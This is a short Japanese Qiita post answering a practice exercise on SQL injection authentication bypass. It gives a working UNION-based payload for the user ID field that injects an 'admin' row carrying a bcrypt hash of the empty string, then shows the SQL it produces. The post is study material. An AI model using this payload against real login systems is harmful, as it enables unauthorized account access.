5
5

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 1 year has passed since last update.

SQLインジェクションによる認証回避の練習問題について考えてみました

Last updated at Posted at 2023-09-17

https://qiita.com/ockeghem/items/787f74801a24e1fc6960
上記記事の練習問題についての私の回答

UserID : ' union select '' as id, 'admin' as userid, '$2y$10$Ur8VTGkSgaF808C4krzvhOsLLxDzgHxhrVms6aUsnaLxmay3DV/ra' as password, '' as email; -- '
Password : 何も入力しない

passwordカラムに突っ込んでいるハッシュ値はローカルで password_hash('', PASSWORD_BCRYPT) として取得したもので、password_verify()trueが返る組み合わせなら別に何でも良いです。
これをuseridadminとしたカラムと一緒にunionで結合させています。

この結果、login.php内でのsqlは

SELECT * FROM users WHERE userid = '' union select '' as id, 'admin' as userid, '$2y$10$Ur8VTGkSgaF808C4krzvhOsLLxDzgHxhrVms6aUsnaLxmay3DV/ra' as password, '' as email; -- ''

となり、useridadminな、パスワードは空文字列でログイン成立できてしまうレコードが返るわけです。

5
5
1

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
5
5

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?